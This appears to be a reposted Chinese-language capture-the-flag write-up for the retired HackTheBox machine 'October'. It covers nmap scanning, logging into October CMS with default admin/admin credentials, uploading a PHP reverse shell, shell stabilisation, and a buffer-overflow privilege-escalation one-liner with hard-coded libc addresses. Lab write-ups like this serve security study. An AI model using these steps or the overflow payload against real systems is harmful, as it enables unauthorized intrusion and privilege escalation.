在数字化转型中,选择合适的跨平台开发框架不仅能提高效率,还有助于确保数据安全与合规性。
714
2022-11-25
HTB-靶机-October
本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关
靶机是作者购买VIP使用退役靶机操作,显示IP地址为10.10.10.16
nmap -sV -sC -p- -T5 -oN october.nmap 10.10.10.16
nmap扫描结果
只有两个端口,访问web应用看看
点了上面的功能按钮,没发现什么有价值的信息,使用dirb命令跑下目录
试了下上面发现的目录都测试了下,发现uri地址backend访问是个登录界面,并且上面显示是october cms程序,谷歌搜索了下,是默认账号密码admin/admin能够正常登录进去
那么直接上传个php5格式的反弹shell代码,结果成功了, 并成功反弹shell (october cms exploit : ,具体步骤如下
非 python环境tty-shellscript /dev/null -c bash在键盘上按住Ctrl+Zstty raw -echofgreset会让你输入类型,输入:xtermecho $TERM(查看类型,可以不执行)export TERM=xtermexport SHELL=bashstty rows 54 columns 104 (得到这个是在本地kali执行 stty -a所获得)
最终获得了tty-shell,使用提权枚举脚本获取到本靶机是需要通过缓冲区溢出的方式进行提权,具体提权代码如下:
while true; do ./ovrflw $(python -c 'print "A"*112 + "\x10\x13\x5e\xb7\x60\x42\x5d\xb7\xac\x3b\x70\xb7"');done
迷茫的人生,需要不断努力,才能看清远方模糊的志向!
版权声明:本文内容由网络用户投稿,版权归原作者所有,本站不拥有其著作权,亦不承担相应法律责任。如果您发现本站中有涉嫌抄袭或描述失实的内容,请联系我们jiasou666@gmail.com 处理,核实后本网站将在24小时内删除侵权内容。
发表评论
暂时没有评论,来抢沙发吧~